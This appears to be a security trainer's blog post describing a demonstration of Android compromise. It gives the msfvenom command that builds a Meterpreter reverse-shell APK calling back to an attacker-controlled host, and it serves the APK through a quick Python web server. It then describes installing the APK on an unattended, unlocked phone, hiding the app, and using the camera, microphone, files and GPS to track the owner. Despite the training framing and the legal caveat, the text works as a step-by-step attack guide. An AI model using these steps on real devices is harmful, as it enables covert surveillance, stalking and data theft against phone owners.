As part of writing content and delivering training to people on the importance of basic cyber security principles, sometimes there is a requirement to demonstrate what is possible to gain the buy-in you require from an audience. That said, I am not advocating to hack everyone's Android phones in a classroom while you demonstrate to them the importance of not installing rogue software... but sometimes I show and tell in a controlled manner is required.
This is an example of how this could be demonstrated to a group, with some easy to find tools with some very hard hitting results.
To start with - this should not be performed on a live audience (i.e. the audience being the target) unless you have somehow acquired an airtight legal waiver or some other golden ticket which authorises you to do this legally. In my case, I am hacking my spare phone, using my server, and the server is only allowing a connection for my use case.
First we need an Android payload, that is fairly easy using msfvenom:
msfvenom -p android/meterpreter/reverse_tcp LHOST=123.456.789.123 LPORT=5001 > android_rev_shell_5001.apk
Why did I choose such a weird port number? When it comes to me remembering which ports are being used for different payloads, I like to separate them by target operating systems. Android happens to be in my 5000 range (personal preference).
Now that I have a payload, I need to get it to the phone somehow. Sometimes this is easy, and it could just be an unattended, unlocked phone where I have a few minutes with their browser in private mode. In any case, I can quickly spin up a web server and serve the malicious APK I have just created:
python -m SimpleHTTPServer
Now I just need to access the mobile phone for a few moments and browse to the server and install the payload.
Now that the application is downloaded, we just need to install it and run it once.... should take a few moments but first we need to make sure Meterpreter is waiting for the connection...
Now we can start the application, then hide it in the background whilst we listen and watch on their movements...
We now have the Android device connected to our Meterpreter handler, but what does this mean?
Well, now I can access the file system, install applications, turn on the camera, microphone and locate their exact position through GPS (that part freaked me out a little too).